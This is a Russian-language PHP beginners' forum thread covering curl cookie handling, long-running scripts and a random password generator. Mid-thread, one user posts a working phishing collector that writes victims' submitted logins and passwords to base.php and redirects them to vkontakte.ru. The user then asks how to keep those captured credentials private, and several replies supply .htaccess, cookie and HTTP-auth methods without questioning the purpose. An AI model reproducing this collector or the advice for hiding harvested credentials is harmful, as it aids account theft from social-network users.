[php] Новичкам: задаем вопросы

Каак можно на пхп сломаать интернет?

 

w.u.n., ты не хакер чтоле?? Любой закер на уровне знает что для этого нужно скачать коякер интернета....

 

юзай cron если unix

 

как мне сделать чтоб логи Базы никто кроме меня не смог просматривать?

PHP:

<?php
$Login = $_POST['login']; 
$Pass = $_POST['passwd'];  
$log = fopen("base.php","a+"); 
fwrite($log,"<br> $Login:$Pass \n"); 
fclose($log); 
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://vkontakte.ru'></head></html>"; 
?>

 

MaTpOc Первой строчкой в файле base.php написать <? if ($_COOKIE['somecook']!=='passwd') die; ?>

Или добавить в .htaccess:

PHP:

<FilesMatch "^base\.php$">
AuthName "Only valid users can download zip files."
AuthType Basic
AuthUserFile /home/www/users/AM/pas/.htpasswd
Require valid-user
</ FilesMatch >


И в файле /home/www/users/AM/pas/.htpasswd - соответственно пароли

 

К примеру,
У тебя файл base.php, следовательно он будет обрабатываться интерпретатором
Ты открываешь файл на добавление
поэтому в начало файла можно написать, <?php exit; ?>
Через веб файл будет недоступен.

Можно через .htaccess закрыть доступ

Можно по типу первого варианта, только повесить авторизацию (401)

PHP:

$auth = 0;
$login = "63a9f0ea7bb98050796b649e85481845"; // root
$pass  = "63a9f0ea7bb98050796b649e85481845"; // root
if($auth && (md5($_SERVER['PHP_AUTH_USER'])!==$login || md5($_SERVER['PHP_AUTH_PW'])!==$pass))
{
    header('WWW-Authenticate: Basic realm="basic"');
    header('HTTP/1.0 401 Unauthorized');
    die("<h1>Forbidden</h1>");
}

 

Как курлом получить\послать куки?
Юхал так

PHP:

...
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt"); 
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt($ch, CURLOPT_COOKIE, "cookie.txt"); 
curl_setopt($ch, CURLOPT_COOKIESESSION, true);
....


и вырезал куки из ответа.. всеравно сервер ругаеться что не посылаються куки.. ((

 

PHP:

    function get($url) 
    { 
        $ch = curl_init();   
        curl_setopt($ch, CURLOPT_URL,$url); 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); 
        curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.1) Gecko/2008070208'); 
        curl_setopt($ch, CURLOPT_COOKIE, "__utma=; __utmb=; __utmc=;__utmz=;");
        $ss=curl_exec($ch); 
        curl_close($ch); 
        return $ss; 
    } 


 

Pashkela, ну это ясно.. так мы передаем куки.. а как их получить с пост запроса... Я регаюсь например на сайте, посылаю постом логин и пасс.. и получаю куки..

 

PHP:

<? 
$ch_autht = curl_init(); 
curl_setopt($ch_autht, CURLOPT_URL, "bla.ru");//куда конектится 
curl_setopt($ch_autht, CURLOPT_COOKIEJAR, 'cookie.txt'); //автоматом запишит все куки в файл 
curl_setopt($ch_autht, CURLOPT_COOKIEFILE, 'cookie.txt');// прочитает куки из записаного файла 
curl_setopt ($ch_autht, CURLOPT_RETURNTRANSFER, 1); 
$ch_buft = curl_exec($ch_autht); 
curl_close($ch_autht); 
echo $ch_buft; 
?>


а у тебя

PHP:

curl_setopt($ch, CURLOPT_COOKIE, "cookie.txt"); 


 

человек заходит на сайт, при этом выполняется определенный пхп скрипт.
как сделать так, чтобы скрипт выполнялся постоянно, без захода человека на сайт

 

эм.. ну как бы .. set_time_limit = 0 ?
один раз зайдёшь и будет он работать .. точнее не зайдёшь, а запустишь.

 

ога и ignor_user_abort();
то есть, добавь в начале скрипта:

set_time_limit(0);
ignore_user_abort();

или запускай скрипт по расписанию через cron.

 

Помогите плиз написать генератор всевозможный паролей.

 

MaTpOc chr() и mt_rand() тебе в помощь

 

А может ему для регистрации надо
Выбирай в цикле случайные буквы из строки алфавита и присоединяй к конечной строке.
Сам напишешь - много опыта получишь. Потом оптимизмруем

 

Дык зачем выбирать... Что-то хранить... Можно просто генерировать из заданного диапазона ASCII код, и через CHR конкатенировать к строке...

 

Да, но отмерка диапозонов, имхо - долгое занятие. Куда проще добавить уже готовый символ в алфавит, чем искать его по таблице. К тому же если в генераторе паролей будет функция выбора доп. символов, то без алфавита никак не обойтись

 

ChaaK, ну в общем да, у тебя будет готовый алфавит, а у меня рваные диапазоны, тут появляется некоторое неудобство... Согласен.

 

PHP:

<form method=post>

<input type=text name=number value="10">

<input type=submit value="Генерировать">

<form><br><br>

<?php

  // Параметр $number - сообщает число 

  // символов в пароле

  echo generate_password($_POST['number']);



  function generate_password($number)

  {

    $arr = array('a','b','c','d','e','f',

                 'g','h','i','j','k','l',

                 'm','n','o','p','r','s',

                 't','u','v','x','y','z',

                 'A','B','C','D','E','F',

                 'G','H','I','J','K','L',

                 'M','N','O','P','R','S',

                 'T','U','V','X','Y','Z',

                 '1','2','3','4','5','6',

                 '7','8','9','0','.',',',

                 '(',')','[',']','!','?',

                 '&','^','%','@','*','$',

                 '<','>','/','|','+','-',

                 '{','}','`','~');

    // Генерируем пароль

    $pass = "";

    for($i = 0; $i < $number; $i++)

    {

      // Вычисляем случайный индекс массива

      $index = rand(0, count($arr) - 1);

      $pass .= $arr[$index];

    }

    return $pass;

  }

?>

Код спизжен